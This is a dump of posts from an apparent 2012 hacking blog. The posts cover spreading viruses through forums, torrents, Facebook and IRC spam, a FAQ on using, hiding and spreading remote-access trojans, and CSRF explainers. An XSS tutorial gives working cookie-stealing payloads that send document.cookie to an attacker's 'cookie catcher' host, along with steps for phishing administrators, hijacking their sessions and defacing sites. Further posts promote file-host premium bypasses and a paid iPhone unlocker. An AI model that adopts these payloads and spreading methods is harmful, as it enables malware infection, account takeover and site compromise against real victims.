Ok, if you are going to buy the full version, you will need forum list. Here's a collection of forums http://www.multiupload.com/GZ6DEXDOK2 , you can use google for more and remember the more the forums are, the more are the downloads. You will need templates, you can download from here http://www.multiupload.com/GE5GCY1OIQ or search Google for more! Now you have to register to the forums, I know it's boring but you have to. To get rid of it, use Roboform which you can get it from http://www.Roboform.com. Install it and open it, and start registering. Ok, after everything is done, start posting things like WinRAR, Crack versions of programs, etc. To get more downloads use screenshot of the program in the thread. If you have troubles with screenshots, download "Icsnap" from HERE. It is a useful tool, which upload pictures images from your desktop to imageshack, directly. Ok , now download "Easy Post creator", it's a useful tool aswell which saves your posts. You can download it from HERE.

Now you can save your posts, and you don't have to rewrite them twice just copy them from Easy Poster and post them in other forums.

5. Torrents

Torrent is a small file (around few kilobytes) with the suffix .torrent, which contains all the information needed to download a file the torrent was made for. You can use public torrents such as:

You can find a list of top 100 downloads for windows applications here:

http://thepiratebay.org/top/301

Or, you can use private torrents , they are the best because people are trustworthy there.

6. Facebook

Facebook is a social utility that connects people with friends and others who work, study and live around them. You can use facebook for spreading your viruses asweel. Join some groups and upload your virus to any hosting website, and tell them that this is a private photo viewer or something like this, and they will trust you.

7. mIRC

The most popular shareware IRC chat client for Windows. You can use it to spread you viruses, join any network and start spamming with your links in all channels saying free psyBNCs, Eggdrops etc, most of people will download it, depens which network you will use, some networks are made for gamers etc.

So friends, I hope you will like this
How To Spread Your Viruses Successfully Over Internet Tutorial....
If you have any problem in above How To Spread Your Viruses Successfully Over Internet Tutorial, please mention it in comments section. Comments, suggestions and ideas are welcomed.If you have other methods let me know, I will add them. :)

Enjoy Email Hacking ........

RAT(Remote Administration Tool) Guide For Beginners - FAQ

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 06:57:09 PST

As we had already discussed about RATS on wildhacker and soon I will post some more articles on RATs like ProRat, Turkojan, Spy-Net etc. But before posting such article i wants to clear some basic problems of readers. Many readers were able to get the trick of RATs and how to use RATs to hack email account.But, some readers were just not able to get out their problems. I have written this article for such readers to help them sort out their RATS related problems.

I was just going through comments made by you guys and noticed some readers left unanswered or they were not convinced by me. So, here are answers to some of commonly asked questions about RATs.

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

FAQ about RAT(Remote Administration Tool)

Question – Whats RAT?
Answer – A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.

Question – How they work?
Answer – Some RATs can spread over P2P file sharing programs(uTorrent, Pirate Bay etc.), Messangers spams(MSN, Skype, AIM etc.).

Question – Download?
Answer – Well you can find some type of RAT here, on wildhacker also I will post some article on RATs soon.Also, you can buy FUD private version of RAT: Albertino RAT, Medusa Rat, jRAT etc. Also you will need DNS host for your RAT.

Question – How do I control server?
Answer – Once installed, RAT server can be controlled via RAT client. From IP list box you choose PC and connect.

Question – What do I need to setup RAT?
Answer – Well, you will need Windows OS,open port & RAT. To forward your port scroll for tutorial visit here.

Question – How do I port forward?
Answer – Port forwarding is easy and important for RAT. Well, you need open port because RAT connects through open port and bypass firewall. Open your web browser and write your IP and connect to your rooter(write Username: Admin & Password: Admin), open port forward page and write port you want and your IP. Well that’s all you need to do and now you got open port. For Port forwarding visit here

Question – How do I make my server FUD?
Answer - If you want to make your server FUD again, you will need crypter(you can find some free FUD crypters here.). Also, you can hex edit your server, but be careful some servers can crash after hex editing, any way check out this cool tutorial How to make FUD with hex editing.

Question – How do I remove server if I infect myself?
Answer – When you infect yourself, first what you going to do is to connect to your PC. Some RATs have function to uninstall servers, well you click that and you uninstall it. Well there is another way, download MalwareBytes’ Anti-Malware and scan whole computer for Trojan.

Question – Legal or illegal?
Answer – Well some RATs are legal, and some are not. Legal are the one without backdoor left, and they have abillity to close connection anytime. Illegal are used for hacking and they can steal data(Credit Cards, Passwords, private data etc.).

Legal:

TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.

UltraVNC – Remote support software for on demand remote computer support. VNC.Specializing in Remote Computer Support, goto my pc, goto assist, Remote Maintenance

Ammyy Admin – Ammyy Admin is a highly reliable and very friendly tool for remote computer access. You can provide remote assistance, remote administration or remote

Mikogo – Mikogo is an Online Meeting, Web Conferencing & Remote Support tool where you can share your screen with 10 participants in real-time over the Web.

Illegal :

DarkComet
CyberGate Rat
ProRat
Turkojan
Spy-Net
Cerberus Rat
SubSeven

Question – Where and how do I spread?
Answer – There are few different ways to spread your server. You can spread on warez websites, P2P file sharing websites(uTorrent, Pirate bay etc.), YouTube etc. Well some people use custom made Auto-Spreaders programs to spread their server. But best and most effective way to spread is when you FUD your server.

Question – Whats DNS host?
Answer – The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.

Question – What can RAT do?
Answer – Here is list of basic features:

• Manage files
• Control web browser(Change homepage, open site etc.)
• Get system informations(OS Version, AV name, Ram Memory, Computer name etc.)
• Get passwords, credit card numbers or private data etc.
• View and remote control desktop
• Record camera & sound
• Control mouse
• Delete, rename, download, upload or move files

Question – What’s reverse Connection?
Answer – A reverse connection is usually used to bypass firewall restrictions on open ports. The most common way a reverse connection is used is to bypass firewall and Router security restrictions.

Question – Whats direct connection?
Answer – A direct-connect RAT is a simple setup where the client connects to a single or multiple servers directly. Stable servers are multi-threaded, allowing for multiple clients to be connected, along with increased reliability.

Question – Can I get traced when I rat somebody?
Answer – Yes and no. Depends on victim, it is really hard to remove infection or even trace a hacker. There are tools like WireShark, but it’s really hard to trace, because PC usually got over 300 connections. So don’t worry.

Direct connection:

Code:
[Client]
| [Client]
| /
| /
| /
| /
[Server]-----[Client]

I received many questions like this. I helped many readers and finally reached conclusion that most of them were not reading my article completely and carefully. So, read article completely and carefully. This is most common question of most of the readers.

Thats it. I hope now, you will have most of your doubts about RATs cleared. This article is meant only for you. If you still have problems in RATs, don't hesitate to ask me in comments.

Enjoy HaCkInG...

Protect Your Facebook, Gmail, Hotmail, Yahoo Accounts From Hackers Using Zemana Antilogger

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 06:58:11 PST

Today I am writing article on "How To Protect Your Computer, Facebook, Gmail, Hotmail, Yahoo Accounts From Hackers Using Zemana Antilogger". Zemana antilogger is a powerful way to protect your PC from malware, remote keyloggers and spyware programs that are widely spread all over the Internet. Zemana Antilogger is the No.1 privacy software that can protect your computer by blocking all the known and unknown Internet threats.

Unlike most antivirus softwares, Zemana antilogger does not rely on the signature based and file scanning approach. Rather it makes use of a unique technology to detect and shut down the malware and spyware programs just before it can steal your identity or hurt your computer. Zemana AntiLogger eliminates threats from keyloggers, SSL banker trojans, spyware, and more..

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Protect Your Computer, Facebook password,....

Today, hackers are constantly trying to intrude vulnerable systems with programs like keyloggers which are capable of recording each and every activity of your computer. But Zemana Antilogger is capable of combating any such keylogger and spy programs, thereby keeping hackers and intruders at bay.

Zemana Antilogger is one stop solution to all of the security threats that your PC may come across. This program is fully compatible with Windows XP (SP2 or higher), Windows Vista (32bit & 64bit) and Windows 7 (32bit & 64bit).

Using Zemana Antilogger, You can..

Do your online banking with peace of mind
Protect against keyloggers
Guard against screen grabbers
Surf anywhere and download anything—worry free
Secure your Internet banking and financial transactions
Protect information in emails and Instant Messages
Protect keystrokes from spyware
Protect all screen images
Increase your PC protection
Defend against hackers

Zemana Antilogger Provides Following Security Features :

SSL Logger protection: 128-bit encryption reliably secures data during online shopping and high-value financial transactions. Unfortunately, a new generation of spyware grabs your data just before it becomes safely encrypted!
Zemana AntiLogger's unique proactive protection prevents your personal information from being stolen while you are conducting online banking transactions or e-commerce using an encrypted 128-bit SSL (Secure Socket Layer).

Webcam Logger protection: Is Big Brother watching you? Hackers and spyware can seize control of your webcam, even when it's switched off! Needless to say, Zemana AntiLogger prevents this.

Key Logger protection: Keyloggers record whatever you type by monitoring the keyboard. This renders most security useless, but not Zemana AntiLogger!

Clipboard Logger protection: Copying, cutting and pasting sends potentially sensitive data to your Windows clipboard where malware can get at it. Fortunately, Zemana AntiLogger deals with all attempts at malicious monitoring, including memory capture.

Screen Logger protection: Just as you can take a screen capture, screenlogger malware snaps the screen at your most vulnerable moments, e.g., when you are plugging in sensitive data such as bank account information with VirtualKeyboard. Zemana Anti-Screen Logger spots this suspicious activity in ways that go beyond the standard, signature-based anti-logging algorithms.

System Defense: Malware likes to get at your registry, your physical memory (RAM), and other sensitive areas so it can inject malicious code and seize control of your PC. Zemana AntiLogger guards against all this, securing the very heart of your machine.

Download Zemana Antilogger

I already have Antivirus and Antispyware software, so why do I need AntiLogger?

Zemana AntiLogger is not designed to replace your installed antivirus and antispyware software -it's designed to detect serious threats that other security products miss. AntiLogger is dramatically different from other anti-malware products that usually only look for virus "fingerprints" which must first be identified by antivirus researchers working in a lab. This delay creates a large window of time during which threats are undetected and can infect your PC -even when you have antivirus and antispyware software installed. Rather than simply using virus "fingerprints" to identify known malware, AntiLogger understands how malware attacks your computer. By detecting running malware and preventing it from harming your computer, AntiLogger adds an extra layer of essential protection to whatever anti-malware software you're currently using.

Stop hackers now with Zemana AntiLogger !

No need to download latest virus signatures
No need to know or detect the malware's signature
No need to wait for updates from a virus lab
No need to scan files
Proactively looks for suspicious activity
Catches not just the usual suspects, but also sophisticated "zero day" malware
Prevents theft of data via secure connections (HTTPS / SSL)
Does not slow down your PC
Easy to download, install and use
Windows Vista and Windows XP compatible

Download Zemana Antilogger

So guys, I hope you have got the trick on how to
Protect Your Facebook, Gmail, Hotmail, Yahoo Accounts passwords...
and other email account passwords from Hacker. If you have any problem in using this Zemana Antilogger software, feel free to mention it in comments section.

Enjoy Hacking......................

Free Wupload, Filesonic, Hotfile, Megaupload Premium Link Generator

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 07:00:32 PST

Hello Guys, After my so many post on How To Hack Website. Today i am sharing this one more premium link generator site for Wupload, Filesonic, Hotfile, Megaupload, It also provides premium cookies for above site which you can use to download unlimited data from Wupload, Filesonic, Hotfile, Megaupload website with high speed like premium accounts.

Most of the users asked me about how to download unlimited from Wupload, Filesonic, Hotfile, Megaupload with high speed without having premium account. So friends this post is for you, by using these premium link generators or using premium cookies you can download unlimited from Wupload, Filesonic, Hotfile, Megaupload for free without any time limitations and with high speed...

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Wupload Premium Link Generator :

Step 1: First of all go to the Wupload premium link generator website. (click here to visit website)

Wupload Premium link generator

Step 2: Now copy your Link in the text box and click on Submit.

Step 3: You will get Premium Wupload Download link bellow submit button.

Step 4: After that login into Wupload free account and use that link to download file as premium user.

Note : Use Internet Explorer or Mozila Firefox Browser.

Step 5: That's all..

Website Hacking : The Cross-Site Request Forgery (CSRF/XSRF) FAQ

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 07:03:03 PST

Hello friends. In my previous article I have written about The Cross-Site Request Forgery (CSRF/XSRF) on WildHacker. Today I wants to clear some basic problems or question of readers about The Cross-Site Request Forgery (CSRF/XSRF. So I am writting this article for such readers to help them sort out their Cross-Site Request Forgery (CSRF/XSRF) related problems.

I was just going through comments made by you guys and noticed some readers left unanswered or they were not convinced by me. So, here are answers to some of commonly asked questions about the Cross-Site Request Forgery (CSRF/XSRF).

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

The Cross-Site Request Forgery (CSRF/XSRF) FAQ

What is Cross Site Request Forgery?
Cross Site Request Forgery (also known as XSRF, CSRF, and Cross Site Reference Forgery) works by exploiting the trust that a site has for the user. Site tasks are usually linked to specific urls (Example: http://site/stocks?buy=100&stock=ebay) allowing specific actions to be performed when requested. If a user is logged into the site and an attacker tricks their browser into making a request to one of these task urls, then the task is performed and logged as the logged in user. Typically an attacker will embed malicious HTML or JavaScript code into an email or website to request a specific 'task url' which executes without the users knowledge, either directly or by utilizing a Cross-site Scripting Flaw. Injection via light markup languages such as BBCode is also entirely possible. These sorts of attacks are fairly difficult to detect potentially leaving a user debating with the website/company as to whether or not the stocks bought the day before was initiated by the user after the price plummeted.

Who discovered CSRF?
In the 1988 Norm Hardy published a document explaining an application level trust issue he called a confused deputy. In 2000 a post to bugtraq explained how ZOPE was affected by a confused-deputy web problem that we would define today as a CSRF vulnerability. Later in 2001 Peter Watkins posted an entry on the bugtraq mailing list coining the CSRF term in response to another thread titled The Dangers of Allowing Users to Post Images.

What can be done with CSRF?
Most of the functionality allowed by the website can be performed by an attacker utilizing CSRF. This could include posting content to a message board, subscribing to an online newsletter, performing stock trades, using an shopping cart, or even sending an e-card. CSRF can also be used as a vector to exploit existing Cross-site Scripting flaws in a given application. For example imagine an XSS issue on an online forum or blog, where an attacker could force the user through CSRF to post a copy of the next big website worm. An attacker could also utilize CSRF to relay an attack against a site of their choosing, as well as perform a Denial Of Service attack in the right circumstances.

Is CSRF and Cross-site Scripting the same thing?
Cross-Site Scripting exploits the trust that a client has for the website or application. Users generally trust that the content displayed in their browsers was intended to be displayed by the website being viewed. The website assumes that if an 'action request' was performed, that this is what the user wanted and happily performs it. CSRF exploits the trust that a site has for the user.

What are common ways to perform a CSRF attack?
The most popular ways to execute CSRF attacks is by using a HTML image tag, or JavaScript image object. Typically an attacker will embed these into an email or website so when the user loads the page or email, they perform a web request to any URL of the attackers liking. Below is a list of the common ways that an attacker may try sending a request.

HTML Methods

IMG SRC
<img src="http://host/?command">

SCRIPT SRC
<script src="http://host/?command">

IFRAME SRC
<iframe src="http://host/?command">
JavaScript Methods

'Image' Object
<script>
var foo = new Image();
foo.src = "http://host/?command";
</script>

'XMLHTTP' Object (See "Can applications using only POST be vulnerable?" for when this can be used)
IE
<script>
var post_data = 'name=value';
var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
xmlhttp.open("POST", 'http://url/path/file.ext', true);
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4)
{
alert(xmlhttp.responseText);
}
};
xmlhttp.send(post_data);
</script>

Mozilla
<script>
var post_data = 'name=value';
var xmlhttp=new XMLHttpRequest();
xmlhttp.open("POST", 'http://url/path/file.ext', true);
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4)
{
alert(xmlhttp.responseText);
}
};
xmlhttp.send(post_data);
</script>

Many other ways exist in HTML/VBScript/JavaScript/ActionScript/JScript and other markup languages to make the users browser perform remote requests.

Is this vulnerability limited to browsers?
Absolutely not. An attacker could embed scripting into a word document, Flash File, Movie, RSS or Atom web feed, or other document format allowing scripting. Applications utilizing XML documents use XML parsers to quickly parse through data. Certain tags within an XML document may tell the XML parser to request additional documents from a URI. Browsers will be the dominant way to execute these attacks but aren't the only way.

Can applications using only POST be vulnerable?
Yes. An attacker could craft a web form on site A and using JavaScript auto submit the form to a target location of Site b. If the application containing the CSRF payload uses a browser component that runs in the local zone, then sending remote POST requests to any website is possible using XMLHTTP or similar objects.

There's another way to attack a website using purely POST based parameters, however this depends entirely on how the web application was developed. Popular web based libraries such as Perl's CGI.PM module allow a developer to fetch a parameter without caring if it came in through a GET or POST request. As is the case with certain usages of CGI.PM, POST requests can be converted to GET by the attacker and the application action will still be performed. Below is an example.

Perl's CGI.PM
------------------------------
use CGI qw(:all);
$value = param('foo');
print "Content-type: text/html\n\n";
print "The 'foo' parameter value is $value\n\n\n";
------------------------------
This script allows either a GET or POST request to be sent the application. This is not limited to Perl and can affect any language depending on the library they are using, or way the application was developed. If you are using CGI.pm and want to prevent GET requests one way is to perform a request method check before executing the rest of your code using '$ENV{'REQUEST_METHOD'}'. Below are the most common ways to fetch a parameter by language, that allow for either GET or POST requests to be sent.

JSP Example
Commonly Used: request.getParameter("foo")
Solution: Check the HTTP Request method and see if it is using POST before performing the requested action.

PHP Example
Commonly Used: $_REQUEST['foo']
Solution: Use $_POST['foo'] instead to specify POST Only.

ASP.NET Example
Commonly Used: Request.Params["foo"];
Solution: Use HTTPRequest.Form (Request.Form) which grabs POST only.
Converting actions to POST only is not a solution to CSRF, but should be implemented as a best practice. See "What can I do to protect my own applications?" for a more comprehensive solution.

How do I detect if a website is vulnerable?
If your website allows performing a site function using a static URL or POST request (i.e. one that doesn't change) then it is possible. If this command is performed through GET then it is a much higher risk. If the site is purely POST see "Can applications using only POST be vulnerable?" for use cases. A quick test would involve browsing the website through a proxy such as Paros and record the requests made. At a later time perform the same action and see if the requests are performed in an identical manner (your cookie will probably change). If you are able to perform the same function using the GET or POST request repeatedly then the site application may be vulnerable.

Can CSRF be prevented by implementing referrer checking?
No for two reasons.
First there are many ways that a Referer header can be blanked out or modified such as via web filtering software, parental control software, privacy software, proxies, or DOM trickery. This makes the referer header unreliable by nature.

Second Referer headers can be spoofed using XMLHTTP and by using flash as demonstrated by Amit Klein and rapid7. While these particular methods have been patched by the vendors, not every user visiting your website has applied these patches. Even if they did the first issue would still exist.

Has a vulnerability in a major site been discovered?
A vulnerability in GMail was discovered in January 2007 which allowed a attacker to steal a GMail user's contact list. A different issue was discovered in Netflix which allowed an attacker to change the name and address on the account, as well as add movies to the rental queue etc...

What can I do to protect myself as a user?
Nothing. The fact is as long as you visit websites and don't have control of the inner architecture of these applications you can't do a thing. The truth hurts doesn't it?

What can I do to protect my own applications?
The most popular suggestion to preventing CSRF involves appending non predictable challenge tokens to each request. It is important to state that this challenge token MUST be associated with the user session, otherwise an attacker may be able to fetch a valid token on their own and utilize it in an attack. In addition to being tied to the user session it is important to limit the time period to which a token is valid. This method is documented in multiple documents however as pointed out in mailing list postings an attacker can utilize an existing browser vulnerability or XSS flaw to grab this session token.

This is most common question of most of the readers about The Cross-Site Request Forgery (CSRF/XSRF).

I hope now, you will have most of your doubts about The Cross-Site Request Forgery (CSRF/XSRF) cleared. This article is meant only for you. If you still have problems in The Cross-Site Request Forgery (CSRF/XSRF), don't hesitate to ask me in comments.

Enjoy HaCkInG...

Website Hacking : Cross Site Request Forgery (CSRF/XSRF) Tutorial Part 4

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 07:03:35 PST

In my previous articles on wildhacker I wrote about How to find a vulnerable Website? , Basic information of website hacking and XSS Tutorial. Today i am writing this Part 4 article on "Cross Site Request Forgery Tutorial For Website Hacking".Today in this article, I am going to teach you how to hack website using CSRF/XSRF attack.

If you have not read part 1 and part 2, I strongly recommend you read both my articles for learning more about Website Hacking....

Basic Information About Website Hacking Part 1

How to find a vulnerable Website?? Part 2

Basic XSS Tutorial For Website Hacking Part 3

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Cross Site Request Forgery Website Hacking Tutorial

What is it?

CSRF attack we can to send a fake request from the browser of the user, and thus enter to site with the permission of the user and maintain interact with the site like the script is the user himself.

CSRF is commonly used to confirm something without the users the awareness, so for example, lets say Bob has an account on webbhosting.com, and Josh wants this account completely removed from the DB, this can be done by the user himself, but others can't remove his account except the ones with appropriate permissions. So lets say the link to remove an account was:

Code:

This can be included in a IMG file, such as:

Code:

You can trick people to go to the link by saying its pictures, a download, etc, etc.

I would also recommend that you encode the action that is being performed via:

meyerweb.com

Prevention:

When you get links sent by people you don't know very well, just use the view-source: function in FF. Another prevention is to add a token via:

Code:

You can also use this to force the administrator to spit logs on the server (in this case a SQL backup) most of these aren't chmod'd, robots.txt'd, so within a few days you can use this to locate the database:

Code:
Code:
etc

I'd recommend using base64/URL encode usage using a ?refer / ?redirect / XSS vulnerability on their site, you can use this to redirect to the dumpfile that will spit the backup log on the site, once clicked by the administrator you're goal is reached.

Example :

A great example of using on CSRF, is bank site after the user connects to site created cookies on his computer(Role of the cookies is save the data).

From this moment any action performed from the user browser approved by the site system. Here comes in the AJAX technology, with the AJAX we can to send request(packet request) performed by the browser itself.

This means all the cookies and sessions of the user sent with the request(Unlike server-side language) So if there is a form that is used on bank site to money transfer.

We can send POST request to a form using AJAX and the request is approved by the site system, because all the cookies of the user browser sent with the AJAX request

Example for CSRF exploit

html:
Code:

php:
Code:

What's the risk here?, as you can see the php script check if it's valid cookies and without additional filtering operation approved the transfer.
This means that if we have the cookies we need only to send fake request to system with the cookies of the user and the system is approved the transfer.

AJAX:
Code:

As already explained, requests sent AJAX are sent from the browser itself so we do not have to worry about to get the cookies of the user.
So even though we sent only the POST in the request sent to the server you'll see something like this:

Code:

Once returned from the server 200(request was received successfully) transferred $100 from the user account to account number 0123456789.
And so the CSRF attack works........

Limitations :

Several things have to happen for cross-site request forgery to succeed:

The attacker must target either a site that doesn't check the referrer header (which is common) or a victim with a browser or plugin bug that allows referrer spoofing (which is rare).
The attacker must find a form submission at the target site, or a URL that has side effects, that does something (e.g., transfers money, or changes the victim's e-mail address or password).
The attacker must determine the right values for all the form's or URL's inputs; if any of them are required to be secret authentication values or IDs that the attacker can't guess, the attack will fail.
The attacker must lure the victim to a Web page with malicious code while the victim is logged in to the target site.

Note that the attack is blind; i.e., the attacker can't see what the target website sends back to the victim in response to the forged requests, unless he exploits a cross-site scripting or other bug at the target website. Similarly, the attacker can only target any links or submit any forms that come up after the initial forged request, if those subsequent links or forms are similarly predictable

So friends, I hope you will like this
Cross Site Request Forgery Tutorial For Website Hacking....
If you have any problem in above Website hacking Using Cross Site Request Forgery Tutorial, please mention it in comments section.

Enjoy Website Hacking ........

WEBSITE HACKING : BASIC XSS TUTORIAL FOR WEBSITE HACKING PART : 3

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 07:04:24 PST

As we had discussed about How to find a vulnerable Website? and Basic information of website hacking in my previous two article on wildhacker. Today i am writing this Part3 article on "Basic XSS Tutorial For Website Hacking".

Today in this article, I am going to teach you how to hack website using XSS. In this article i have shared Cookie Catcher page, which is used for catching cookies.

If you have not read part 1 and part 2, I strongly recommend you read both my articles for learning more about Website Hacking....

Basic Information About Website Hacking Part 1

How to find a vulnerable Website?? Part 2

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Learn Website Hacking Using XSS....

What is XSS ???

Also known as Cross Site Scripting, regarded as the second biggest web hazard next to Sqli. It can be found in so many big websites. It is basically client sided code being inserted into webservers which is then saved and displayed to people viewing the website. Similiar to a deface. It occurs through lazily coded webpages and applications.

XSS is in 2 Types,

- Persistent
- Non-Persistent type

In this article I will cover both types Persistent and Non-Persistent type. For XSS we will use something called a Cookie Catcher.

Question will be that why we would need someones else cookies?

The answer is that we can change our browser's cookies to login as them!!!So lets call it Session Hijacking.

First go to a free hosting site like http://adf.ly/3x7NB or any other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: Download Here

What does the cookie catcher do?
It grabs the user's:
Cookies
IP
Referral Link. Which Page is attached to that Link
Time And Date

Find Vulnerable Sites :

Now first we need to find sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.

[ I will use this site that many of you probably saw it before. http://adf.ly/3wDmP ]

Now for testing If a site is vulnerable or not you can add these codes:

Code:
"><script>alert(document.cookie)</script>

Code:
'><script>alert(document.cookie)</script>

Code:
"><script>alert("Test")</script>

Code:
'>&ltscript>alert("Test")</script>

Some new one which you can use to inject HTML:

Code:
"><body bgcolor="FF0000"></body>

Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

Then if we see a java script popup Or if you used my testing and you saw the page's background go black or a page of google opens in that site it means its vulnerable to XSS attack.

Note : The site Needs to have cookies supported! a blank javascript means you need to go to another site.

In the end, if your site is http://www.example.com
The link to test it would be:
http://www.example.com/index.php?id="><script>alert(document.cookie)</script>

Persistent XSS :

By using this method we can grab the slave's cookies with no suspection and completely stealth.

Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.

Ok now lets go to this site: http://adf.ly/3wEX3
Now test and see if the XSS vulnerable test work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type or submit it, add this:

Code:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Note : Change URL (www.you.110mb.com/cookie catcher.php )as per your cookie catcher file url

and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
so they wont suspect you.

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher.php search for cookies.html which is a new file that show you the cookies. Like if your cookie catcher link would be: http://www.example.com/cookie catcher.php
The container of the cookies would be: http://www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie!

This is another way for a cookie grabbing drive by, add this code and post it:

Code:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>

Then post it in the forum or the comment box.
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a <iframe src="www.google.com"></iframe> and you will understand iframes more Smile

Note : The site Needs to have cookies supported! a blank javascript means you need to go to another site.

Non-Persistent XSS :

In this method we will make the slave admin go to our link. First we will pick a XSS vulnerable site. For this method we will need a search.php which that page is vulnerable to XSS and has cookies in that page. In the vulnerable search.php in the textbox for the word to search for type:

Code:
<script>alert(document.cookie)</script >

And click the search button. If you see a javascript popup means its vulnerable to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: http://adf.ly/3wEX3

Now in front of the search.php?search= add this:

Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Note : Change URL (www.you.110mb.com/cookie catcher.php )as per your cookie catcher file url

Now go to http://www.spam.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vulnerable website and send a Fake Mail from a online fake mailer like this one: http://adf.ly/1Bqn5

Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the spam will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him.

Session Hijacking :

Now you have the Admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note open Notepad. The ; separates cookies from each other so first copy the code before the ; .
Now go in that vulnerable website and clear the link. Instead of that link add this:

Code:
Javascript:void(document.cookie="")

or for an example:

Code:
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And you are logged in as administrator. So now go in your Admin Panel and upload your Deface Page. Now you have Hacked a Website with XSS.

So friends, I hope you will like this
Basic XSS Tutorial For Website Hacking....
I have personally tested this Website Hacking Tutorial and found all are working. If you have any problem in above Website hacking Using XSS Tutorial, please mention it in comments section.

Enjoy Website Hacking ........

Hack Iphone : Jailbreak or Unlock Iphone

noreply@blogger.com (Niketan Patil) — Wed, 18 Jan 2012 07:04:54 PST

Jailbreaking is a process where you hack your device to give it more functionality. You also have the FREEDOM to use your iPhone with the carrier you choose after Jailbreaking. There is a huge international community (Cydia) of Apple Jailbreakers. When you Jailbreak your device you will gain access to Cydia. Cydia works similar to Apples Apps Store but is filled with apps that greatly improve the functionality of your device.

The best part is that almost everything in Cydia is FREE!!!!..You can download and install free apps, games, customized keyboards, ringtones, themes, toys, utilities, wallpapers, etc. all for free!

You might be interested in some of our other articles:

Don’t forget to Subscribe to our RSS feed

Jailbreak or Unlock Iphone

What Is Jailbreaking?

Apple likes to keep a strong grip of control over their products and the Apple Apps Store that millions of people use on a daily basis. Because of this Apple regularly disapprove apps that compete with the core features of their products, disapprove apps that improve the features of their products because they plan to implement those features theirself at a later date, or simply disapprove apps because they don't like them.

Because of this control, Jailbreaking was born. Jailbreaking is a process where you hack your device to give it more functionality. There is a huge international community of Apple Jailbreakers and the community grows larger everyday. When you Jailbreak your Apple device you gain access to this community and all it has to offer. When you Jailbreak your device you will gain access to Cydia. Cydia works similar to Apples Apps Store but is filled with apps that greatly improve the functionality of your device. The best part is that almost everything in Cydia is FREE! You can download and install free apps, games, customized keyboards, ringtones, themes, toys, utilities, wallpapers, etc. all for free! THERE ARE EVEN WAYS FOR YOU TO USE CYDIA TO GET PAID APPS FROM APPLES APPS STORE FOR FREE! (AutomaticiPhoneUnlockers.com does not condone piracy or copyright infringement.) The point is, Jailbreaking your Apple device will take it to the next level and make your friends even more envious then they already are.

What Is Unlocking?

Once again Apple and their chosen phone carriers are trying to keep a strong grip of control over their products and services. When you purchase an Apple iPhone chances are it is going to be locked so it can only be used with the carrier you purchased it from. This is where Unlocking comes in. Unlocking lets you break that grip of control so you can use your iPhone with any carrier you choose. You must Jailbreak your iPhone before you can Unlock it, but once you have not only do you have all the added functionality that comes with Jailbreaking, you also have the FREEDOM to use your iPhone with the carrier you choose!

To Jailbreak or Unlock Iphone Click Here

AutomaticiPhoneUnlockers offer the latest software to help you Jailbreak or Unlock your Apple devices. On AutomaticiPhoneUnlockersguides and software are kept up to date and can Jailbreak or Unlock any iPhone, iPod Touch, iPad, and even the new Verizon iPhone. They also help you to Jailbreak or Unlock Apple devices that were damaged from bad unlockers and can also unlock iPhones that were locked due to an update in itunes.

Using this dedicated unlocking solution you can easily Jailbreak or Unlock your Apple iPhone, iPod Touch, or iPad!

Features :

Use Any Cell Phone Company
Works On All iPhones
Easiest Unlocking Solution
Unlock All Features
Enable Tethering
Free Lifetime Updates
24/7 Support Staff
100% Safe And Reliable
Instant Download
Over 100,000 Users

To Jailbreak or Unlock Iphone Click Here

Instant Download - After you purchase you will get instant access to all software and guides, so this means no waiting or shipping! You can Jailbreak and Unlock your iPhone, iPod Touch, or iPad within minutes! All you need to do is login to the members area by entering the email address you used at the time of purchase into the Login form. That's it and everything is at your fingertips.

So friends, I hope this jailbreak or nnlock Iphone tutorial will be useful for you. If you have any problem in this jailbreak or unlock Iphone tutorial, please mention it in comments bellow.

